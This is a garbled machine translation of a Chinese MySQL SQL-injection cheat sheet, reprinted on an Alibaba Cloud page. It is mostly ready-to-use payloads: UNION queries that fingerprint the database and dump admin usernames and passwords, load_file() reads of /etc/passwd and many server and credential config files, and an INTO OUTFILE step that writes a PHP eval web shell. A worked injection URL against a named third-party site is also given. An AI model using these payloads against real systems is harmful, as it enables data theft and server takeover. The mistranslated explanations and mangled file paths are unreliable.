MySQL Injection statement

Last Update:2018-09-06 Source: Internet

Author: User

Tags mysql injection ord

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

and Ord (Mid (Version (), >51))
- Explanation 1: Verify that Database version 51 is ASCII code 3 is correct >4.0 error is <4.0, when the version is greater than 3.0 to use the Union method;
- Explanation 2:ord () is a MySQL function used to get binary codes;
- Explanation 3:mid () is a function of MySQL for intercept operations;
- Explanation 4:version () is the MySQL function used to get the version of the current database;
Union Select 1,1,1,****1,1
- Explanation: A federated function that is used to test the number of fields returned by the current SQL query results;
ORDER BY 13
- Explanation: Sorting function, based on the number of fields in the query results, to test the number of fields returned by the current SQL query
Union select 1,2,3,4,****11,12,13 from admin
- Explanation: Returned correctly the admin table name exists
Union select 1,version (), 3,*** from admin
- Explanation: The Storm database version
Union select 1,username,3,*** from admin
- Explanation: Mob Account/Password
Union select 1,username,3,*** from admin where id=2
- Explanation: Storm Admin table 2nd User primary key is ID
and Ord (in mid (User (), 1, 1)) =144
- Explanation: The root authority returned to the correct existence
and 1=1 Union Select 1,2,3,4,5.......N
- Explanation: Matching fields
and 1=2 Union Select 1,2,3,4,5.....N
- Explanation: Storm field position
Version () database () User ()
- Explanation: Using built-in functions to storm database information

No need to guess the available fields. Database Information (some sites do not apply):
- and 1=2 UNION ALL select version ()
- and 1=2 UNION ALL Select Database ()
- and 1=2 union ALL Select User ()
and 1=2 UNION ALL SELECT @ @global. Version_compile_os from Mysql.user
- Explanation: Get operating system information:
and Ord (in mid (User (), 1, 1)) =114
- Explanation: Get database permissions, if return normal description as root permission
and 1=2 Union select 1,2,3,schema_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. Schemata Limit 0,1
- Explanation: Bauku (mysql>5.0) MySQL 5 has a built-in library information_schema that stores all of MySQL's database and table structure information
and 1=2 Union select 1,2,3,table_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. TABLES where table_schema= database (hex) limit 0 (start record, 0 is the first start record), 1 (show 1 Records)
- Explanation: Guessing table
and 1=2 Union select 1,2,3,column_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. COLUMNS where table_name= table name (hex) Limit 0,1
- Explanation: Guessing fields
And 1=2 Union Select, user name segment, 5,6,7, password segment, 8,9 from table name limit 0,1
- Explanation: Burst Password
Union Select 1,2,3concat (user name segment, 0x3c, password segment), 5,6,7,8,9 from table name limit 0,1
- Explanation: Advanced usage (one available field shows two data content)

Direct Write horse (Root permission)
- Condition 1: Know the site physical path
- Condition 2: Have sufficient permissions (can be used with select .... from Mysql.user test)
- Condition 3:MAGIC_QUOTES_GPC () =off select ' <?php eval ($_post[cmd])?> ' into outfile ' physical path ' and 1=2 union ALL select sentence hex value i nto outfile ' path '

Load_file () Common paths:
- Replace (Load_file (0x2f6574632f706173737764), 0x3c,0x20)
- Replace (Load_file (char (47,101,116,99,47,112,97,115,115,119,100)), char (All), char (32))
  - Explanation: The above two are a full display of code in a php file. Sometimes you do not replace some characters, such as "<" is replaced by "space" to return a Web page. You can't see the code.
- Load_file (char (47))
  - Explanation: You can list the Freebsd,sunos system root directory
- /etc tpd/conf tpd.conf or/usr/local/apche/conf tpd.conf
  - Explanation: View the Linux Apache virtual host configuration file
- C:\Program files\apache group\apache\conf \httpd.conf or C:\apache\conf \httpd.conf
  - Explanation: Viewing the Windows system Apache file
- C:/resin-3.0.14/conf/resin.conf
  - Explanation: View JSP developed Web site resin file configuration information
- C:/resin/conf/resin.conf/usr/local/resin/conf/resin.conf
  - Explanation: View a JSP virtual host for Linux system configuration
- D:\APACHE\Apache2\conf\httpd.conf
- C:\Program Files\mysql\my.ini
- .. /themes/darkblue_orange/layout.inc.php phpMyAdmin
  - Explanation: Explode path
- C:\windows\system32\inetsrv\MetaBase.xml
  - Explanation: View the IIS Virtual host configuration file
- /usr/local/resin-3.0.22/conf/resin.conf
  - Explanation: Resin configuration file for 3.0.22 view
- /usr/local/resin-pro-3.0.22/conf/resin.conf Ibid.
- /usr/local/app/apache2/conf/extra tpd-vhosts.conf Apashe Virtual host view
- /etc/sysconfig/iptables
  - Explanation: Look at the firewall policy
- USR/LOCAL/APP/PHP5 B/php.ini
  - Explanation: PHP's quite set
- /etc/my.cnf
  - Explanation: MySQL configuration file
- /etc/redhat-release
  - Explanation: The system version of the Red Hat
- C:\mysql\data\mysql\user. MYD
  - Explanation: A user password exists in the MySQL system
- /etc/sysconfig/network-scripts/ifcfg-eth0
  - Explanation: View IP
- /USR/LOCAL/APP/PHP5 B/php.ini
  - Explanation: PHP Related Settings
- /usr/local/app/apache2/conf/extra tpd-vhosts.conf
  - Explanation: Virtual Site Settings
- C:\Program Files\rhinosoft.com\serv-u\servudaemon.ini
- C:\windows\my.ini
- C:\Boot.ini
- Website Common configuration file config.inc.php, config.php. Load_file () with replace (Load_file (HEX), char (32))
- Note: Char (60) indicates that <,char (32) represents a space

Problems with manual injections:
- After injection page display: illegal mix of collations (latin1_swedish_ci,implicit) and (utf8_general_ci,implicit) for operation ' UNION '
  - such as: Http://www.www.myhack58.com/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file ( 0x433a5c626f6f742e696e69), 3,4,user ()%20, this is due to inconsistent coding inconsistencies, workaround: Precede the parameter with Unhex (hex (parameter)) on it. The above URL can be changed to: http://www.www.myhack58.com/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201, Unhex (Hex (Load_file (0x433a5c626f6f742e696e69))), 3,4,unhex (Hex (user))%20, can continue to inject.
  - Reprinted from: 47945745

MySQL Injection statement

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More